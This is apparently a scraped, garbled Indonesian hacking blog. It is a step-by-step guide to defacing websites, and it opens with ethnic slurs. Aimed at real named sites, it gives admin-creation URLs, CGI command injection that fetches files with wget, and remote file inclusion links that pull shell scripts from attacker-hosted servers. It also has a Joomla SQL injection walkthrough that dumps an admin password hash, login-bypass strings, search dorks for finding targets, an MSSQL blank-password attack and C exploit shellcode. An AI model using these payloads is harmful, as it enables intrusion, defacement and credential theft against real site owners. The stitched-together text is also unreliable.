Professional Documents
Culture Documents
id.wikipedia.org
MEDAN
bajingan
CINA Bangsat…
…………yang
pernah merasa
sakit ati sama
CINA dea Cyndi
nyoto rahman
langkah-langkah deface website lengkap...!
udah lama nih udah nda nge posting tentang hacking maklum lagi
sibuk
cari dollar dan di sini saya akan menjelaskan berbagi macan jenis
deface
yang skarang di pergunakan para hacked indo untuk hack website
orang
malaysia untuk membela manohara....! (seperti emould.com.cn dan
hacked by x-blank )
wikipedia.org bajingan bangsat kaskus.us tikus got buaya darat
bangsat luuuuh kaskus racun aids
Kompolnas.go.id
Deface situs php nuke
Kaskus.us
?op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.id.wikipedia.org/nuke/admin.php?
op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
Kalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing lu muncul
www.id.wikipedia.org/nuke/admin.php?op=mod_author
========================================
=======================================
contoh :
Catatan :
Kalo nggak ada gambarnya, yg ada hanya tulisan
contoh :
Nama : deface
Email : deface_2005@yahoo.com
Website : www.deface.com
Asal : dunia maya
komentar :
Catatan :
Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya
sesuai
keinginan lu.
IV. Klik tombol “submit” atau tombol apa namanya yg ada di
guestbook tsb.
Selanjutnya buka url/browsing baru trus ketik target tadi
www.namatarget.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab “refresh” di samping
url/browsing lu.
Nah…muncul deh hasil deface kita di guestbook tsb.
======================================
======================================
deface cgi
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/we
b_store.cgi?page=coart_frontpage.html <<<
page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget"
nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<<
target =""> allinurl:*.cgi * page:.*html+site:.us atau
http://www.google.co.id/search?q=allinurl:*.cgi%3Fpage%3D*.html+si
te:.com&hl=id&lr=&start=10&sa=N
target nya musti file html diujung nya kalo mau tambahin |pwd|
=======================================
deface cgi II
http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm|id|
http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm|pwd|
http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm|echo “Hacked by
psychophysiological. Hey admin…do you a need help ?
Matrix.Dal.Net - surabayahack” >
/usr/home/web/users/a0004481/html/adspro/jh.html|
http://www.sports-media.org/adspro/jh.html
http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm << page="top.htm|pwd|">>>>>>>
usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro
usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<<
html =""> http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|
http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|
echo “Hacked by psychophysiological. Hey admin…do you a need
help ? Matrix.Dal.Net - surabayahack”>decae.html|
&cart_id=9721374.5730
http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|
echo%20
======================================
deface php dgn injection
http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=
4
itu file aslinya
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path
=
itu bug nya
http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admi
n.php?phpbb_root_path=http://www.geocities.com/sandal_karet/scrip
t/arai2.jpg?
jadi index.php?name=PNphpBB2&file=index&c=4 dibuang
cara inject nya
http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admi
n.php?phpbb_root_path=http://www.geocities.com/sandal_karet/scrip
t/arai2.jpg?
dikotak command unix masukin
wget http://geocities.com/nusantarajaya_2004/arai.html
cara liat nya
http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html
http://www.narnia-chroniken.de <<<
phpbb_root_path="http://geocities.com/sandal_karet/script/arai2.jpg?"
>
========================================
http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.p
hp
itu file aslinya
http://www.giphted.com/index.php?siteName=http://www.geocities.co
m/sandal_karet/script/arai2.jpg?
dikotak masukin: pwd
jadi pics%2Fom%2Findex.php dibuang
cara inject nya
http://www.giphted.com/index.php?siteName=http://www.geocities.co
m/sandal_karet/script/arai2.jpg?
dikotak masukin: wget
http://www.geocities.com/nusantarajaya_2004/arai.html -O
/export/home/beangyy/www/arai.html
cara liat nya http://www.giphted.com/arai.html
=========================================
deface phpbb/forum
http://www.bpmpt.go.id/forum/index.php
itu file aslinya
includes/db.php?phpbb_root_path=
itu bug nya
jadi index.php dibuang
http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http
://www.geocities.com/sandal_karet/script/ara2.jpg?
dikotak masukin: pwd
Kalo keluar “Hacking attempt” artinya dipath
Tapi kalo berhasil, terserah lu mau di apain……
==========================================
deface phpbb/forum II
http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12
itu file aslinya
&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pw
d
itu bug nya
cara inject nya
http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight=%25
27.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
=========================================
http://www.friendster.com/useropen.php?uid=
<<<<<<>
===========================================
http://www.zone-
h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/
http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk=
http://www.tyg2004.de/index.php?page=http://www.geocities.com/jam
bihackerlinkcrew/sql.htm?&cmd=id;pwd
http://img143.imageshack.us/img143/6782/hacked8lc.jpg
http://www.sobatpadi.net/download/
http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://w
ww.geocities.com/dian_maulani2005/inject.htm?&cmd=id;pwd;ks%20
-la
http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani
hack ip ini sering saya gunakan pada saat saya ingin main curang
pada beberapa
media yang memberikan uang kepada saya seperti
kumpulblogger.com ato adsense
http://anonymizer.nntime.com/
http://www.unrestrictedsurf.com/
Join Vinefire!
1. Register/Daftar ke Vinefire.com
Ya, belum lama ini, salah satu component joomla terbukti mengidap
penyakit berbahaya, tumor ganas yang akan menjalar keseluruh
tubuh, dan berakibat kematian pada akhirnya. :D~~
http:// korban.com/index2.php?option=ds-
syndicate&version=1&feed_id=1
Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita
tes kelemahannya, dengan penambahan tanda kutip ( ' ) di
belakangnya.
http:// korban.com/index2.php?option=ds-
syndicate&version=1&feed_id=1'
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/*
--> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/*
--> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/*
--> errornya sama
index2.php?option=ds-
syndicate&version=1&feed_id=1+order+by+20/* --> errornya
sama
index2.php?option=ds-
syndicate&version=1&feed_id=1+order+by+21/* --> errornya
berbeda
Selanjutnya kita test, apakah fungsi union dapat berjalan pada url
korban.
index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,1
0,11,12,13,14,
15,16,17,18,19,20+from+jos_users
from+jos_users
Setelah itu buka file yang baru didownload tersebut dengan editor
seperti notepad, walaupun filenya xml, tapi penulis tetap
menyarankan untuk membukanya dengan notepad, tidak dengan
browser internet, karena memudahkan untuk pembacaan hasil dari
sql injection yang telah dilakukan.
http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+jos_users
Mysql versi 5.0.33 :D, sampai sini anda telah dapat eksplorasi
database user dengan leluasa. Apa yang dilakukan seorang attacker
selanjutnya ? ya, mendapatkan username dan password si admin.
:D.
Pengambilan username dan password secara paksa menggunakan
sql injection ini dapat dilakukan secara satu persatu, ataupun
sekaligus. Query untuk menampilkan username menggunakan bug
sql injection yang satu ini, anda cukup mengganti @@version yang
tadi dengan field yang menyimpan informasi username tentunya,
gunakan url ini :
http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_
users
http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users
perhatikan, string username, diganti dengan
concat(username,0x3a,password,0x3a,email,0x3a,usertype),
penggunaan concat disini adalah mengconvert suatu hexa, ataupun
spesial karakter kedalam bentuk ascii, sehingga, yang terjadi
nantinya adalah :
0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di
atas. Yang penulis dapatkan adalah informasi seperti ini :
admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:al
kemail@gmail.com:Super Administrator
Jika di urutkan :
Username : admin
Password ( hash ) :
bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.com
Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker,
akibat dari seorang admin yang malas melakukan patch pada
systemnya.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0
.15-Stable-Full_Package.zip
http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-
syndicate.tar.gz
http://Kumpulblogger.com/signup.php?refid=69320
Promosikan dan Gunakan URL tersebut untuk memperbanyak
anggota kumpulblogger.com yang tergabung dibawah rekomendasi
anda.
Bagaimana Cara Mendapatkan Peringkat di Search Engine???
2. Catat lima website yang muncul teratas dari deretan itu dan
kunjungilah tiap website tersebut.
id.wikipedia.org
0 comments
Bagi Anda orang IT pasti sudah tidak asing lagi mendengar nama
Microsoft SQL Server. Produk RDBMS terkenal buatan Microsoft ini
memang sangat banyak dipakai di seluruh dunia oleh perusahaan-
perusahaan untuk menyimpan informasi dan aset digital mereka.
Banyak yang menggantungkan nasib perusahaan pada sang SQL
Server.
Anda dilarang keras mengutip sebagian atau seluruh artikel ini tanpa
sepengetahuan penulis. SQL Server yang akan kita bahas disini
menggunakan SQL Server 7 atau bisa juga versi 2000 nya. SQL
Server 7 memberikan dua jenis autentikasi untuk mengakses server
database yaitu: 1. Windows NT Authentication Mode 2. Mixed Mode
Jika Anda menginstall SQL Server dengan menggunakan Windows
NT Authentication Mode maka secara otomatis login ke SQL Server
akan mengikuti login Windows NT dan user dari Windows NT sajalah
yang berhak untuk mengakses SQL Server.
Jika SQL Server diinstall pada Mixed Mode maka setiap user yang
login ke SQL Server bisa diautentikasi oleh Windows NT atau oleh
SQL Server itu sendiri. User login yang diautentikasi oleh SQL Server
harus memberikan username dan password yang dimaintenance
sendiri oleh SQL Server dan ini merupakan salah satu awal bencana.
Ketika Anda menginstall SQL Server pada Mixed Mode maka secara
otomatis SQL Server memiliki default account SA (system
administrator) dengan password kosong (blank password).
Jika Anda login dengan account "sa" ini maka Anda sudah memiliki
hak akses sangat luar biasa terhadap SQL Server yang meliputi
semua database, tabel, stored procedure, security dan bahkan
secara sadar atau tidak Anda juga otomatis memiliki akses besar ke
sistem komputer tempat SQL Server diinstall. Menurut pengamatan
penulis dilapangan menunjukkan bahwa masih sangat banyak sekali
SQL Server baik yang bersifat production server atau experiment
server yang ternyata belum dikonfigurasi dengan benar. Salah satu
contoh miskonfigurasi di SQL Server ya seperti yang sudah
disebutkan diatas, yaitu DBA nya lupa memberi password untuk
account "sa" dan SQL Server diinstall pada Mixed Mode.
Jika Anda berminat untuk mencoba maka sekarang mulai saja men-
scan host yang port 1433 nya terbuka dan jika sudah menemukan
host yang port 1433 nya terbuka cobalah akses kesana dengan
menggunakan program Query Analyzer atau Anda juga bisa
menggunakan SQL Server query dalam mode dos yaitu isql.exe.
Jika Anda ingin mencobanya dengan ISQL maka coba ajah ketikkan
perintah berikut untuk login ke SQL Server dari command prompt:
C:>isql -S targethost -U sa Kemudian tekan enter, dan akan muncul
inputan password, terus tekan enter saja.
0 comments
#include
#include
#include
#include
char badbuffer[] =
"\x04"
"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTH
CTHC"
"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTH
CTHC"
"\xdc\xc9\xb0\x42"
"\xeb\x0e"
"JC"
"THC!"
"\x01\x70\xae\x42"
"\x01\x70\xae\x42"
"\x8b\xfc\x83\xc7\x2c\x66\x81\xec\x04\x02\x33\xc9\xb2\x35\x66"
"\x81\xc1\x38\x01\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16"
"\x4f\x5c\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1"
"\x36\xc5\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71"
"\x79\x79\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f"
"\x05\x6c\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d"
"\xb8\x6a\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29"
"\x34\xcc\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce"
"\x04\xfc\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4"
"\xd7\xb1\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c"
"\x25\x40\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25"
"\x74\x3a\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc"
"\x71\xb8\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78"
"\x17\xb8\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30"
"\xb5\x70\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca"
"\xca\xbc\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2"
"\x60\x6d\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62"
"\xca\x60\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca"
"\x60\xd1\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b"
"\x50\x4d\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1"
"\x62\x62\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65"
"\xb8\x70\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66"
"\x66\x60\xca\x60\xd9\x5f\xca\xca\x60\xd5";
void usage();
if(argc<2)
usage();
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(sqludp.sin_addr),hp->h_addr,hp->h_length);
else
sqludp.sin_addr.s_addr = addr;
if (hp)
sqludp.sin_family = hp->h_addrtype;
else
sqludp.sin_family = AF_INET;
sqludp.sin_port=htons(sqlport);
shutdown(sock,1);
closesocket(sock);
exit(0);
}
void usage()
{
unsigned int a;
printf("\nUsage: \n");
exit(0);
1 comments
Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya
uptodate tiap menit bahkan detik siapa tuh yang update yahh para
hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas
apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar
menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA
BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN
INI.titik
Pembahasan:
SEMUA INI DARI SABEN ----->
------------------------------------------------
keyword:inurl:"/cart.php?m="
contoh:http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : 'or"=" password :'or"="
------------------------------------------------
keyword inurl:"/modernbill"
contoh:http://billing.ourweb.net/modernbill/
masukin injekannya:include/html/config.php?DIR=http://one-
server.us/injek.txt?
jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=
http://one-server.us/injek.txt?
------------------------------------------------
keyword:"Powered by SunShop 3.2" atau:
inurl:"/sunshop/index.php?action="
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi :
http://www.dohertysgym.com/sunshop/admin
login pake user: admin pass: 'or''='
------------------------------------------------
inurl:"modules.php?name=SQuery"
injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
contoh:http://www.dies-
world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
------------------------------------------------
google:allinurl:com_galleria
injek:components/com_galleria/galleria.html.php?mosConfig_absolut
e_path=http://one-server.us/item.txt?
contoh:http://www.a1gpracing.net/components/com_galleria/galleria.h
tml.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?
------------------------------------------------
google:allinurl:"/auth/lostPassword.php"
contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.ph
p
injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?
jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?i
ncludePath=http://one-server.us/item.txt
------------------------------------------------
google:intitle:"Multimedia Flash Website Builder"
contoh:www.webdesignhq.com/sitebuilder/index.php
injek:sitebuilder/admin/top.php?admindir=http://one-
server.us/item.txt?
jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http:
//one-server.us/item.txt?
------------------------------------------------
gogle:"software 2004-2005 by randshop"
contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php
?id=20&katid=32&action=detail
injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPf
ad=http://one-server.us/item.txt?
------------------------------------------------
keyword;"powered by geeklog"
contoh:http://www.kobe-ch.com/index.php
injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http:
//geocities.com/shella_kapas/kek.jpg?
jadi:http://www.kobe-
ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=ht
tp://geocities.com/shella_kapas/kek.jpg?
------------------------------------------------
google:inurl:"/product.php?printable=" atau "powered by x-cart"
inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin
kekekek biasa sqlnya cari sendiri ya
------------------------------------------------
keyword:inurl:"/index. php?option=com_rsgallery"
bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolu
te_path=http://elang13.org/item,txt?
contoh:http://www.pass-my-
shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosCon
fig_absolute_path=http://elang13.org/item.txt?
------------------------------------------------
keyword:"Advanced Poll" inurl:/admin/
contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php
bug:common.inc.php?base_path=http://elang13.org/item.txt?
jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php
?base_path=http://elang13.org/item.txt?
------------------------------------------------
inurl:"powered by cs-cart"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://el
ang13.org/item/txt?
------------------------------------------------
inurl:"/catalogue.php?cat="
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas
ente ente sekalian nyari sqlnya hak hak hak
inurl:"/DoceboScs"
injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://ela
ng13.org/hitam.txt?
inurl:"/DoceboCore"
injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://ela
ng13.org/hitam.txt?
inurl:"/DoceboLms"
injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http:/
/elang13.org/hitam.txt?
inurl:"/DoceboKms"
injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[wher
e_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboCMS"
injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=
http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"dload.php"
injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=
http://elang13.org/hitam.txt?
------------------------------------------------
"powered by squirrelcart"
injek : squirrelcart/cart_content.php?cart_isp_root=
------------------------------------------------
keyword inurl:/ubbthreads/
injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.
org/hitam.txt?
------------------------------------------------
allinurl:"index.php?target=categories"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://el
ang13.org/item.txt?
------------------------------------------------
google : "Exhibit Engine 1.5 RC 4"
injek:photo_comment.php?toroot=http://elang13.org/item.txt?
------------------------------------------------
inurl:"/modules/Forums/
injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/ite
m.txt?
------------------------------------------------
allinurl: includes/include_once.php
bug:includes/include_once.php?include_file=http://elang13.org/item.t
xt?
------------------------------------------------
allinurl:/phplivehelper/blank.php
injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?
------------------------------------------------
google:"powered by DreamAccount"
injeknya:
auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
auth.header.inc.php?da_path=http://elang13.org/item.txt?
auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
------------------------------------------------
ashopKart20/" ganti tulisan yang ada didepannya ama
admin/scart.mdb
------------------------------------------------
inurl:"//comersus/" ganti /store/xxxx.asp dengan
database/comersus.mdb
------------------------------------------------
allinurl:/shop/category.asp/catid=
hapus tuisan /shop/category.asp?catid=2 ganti dengan
/admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses
ccnya biasayanya di encrypt
http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp
------------------------------------------------
inurl:"/admin/default.asp"
username:admin password:'or''='
span style="color: rgb(51, 51,
255);">------------------------------------------------
inurl:"/metacart/"
injek : database/metacart.mdb
------------------------------------------------
inurl:"/store/proddetail.asp?prod="
ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
------------------------------------------------
inurl:"/AdminLogin.asp"
login pake sql ini :
usename:1'or'1'='1
password:1'or'1'='1
------------------------------------------------
inurl:"com_a6mambocredits"
http://www.targer.com/administrator/components/com_a6mambocredi
ts/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.co
m/tembuspakeshell.txt
------------------------------------------------
"Welcome to phpMyAdmin" inurl:main.php
------------------------------------------------
filetype:sql ("passwd values ****" | "password values ****" | "pass
values ****" )
------------------------------------------------
inurl:"com_peoplebook"
inurl:"com_comprofiler"contoh gambar di bawah ini...!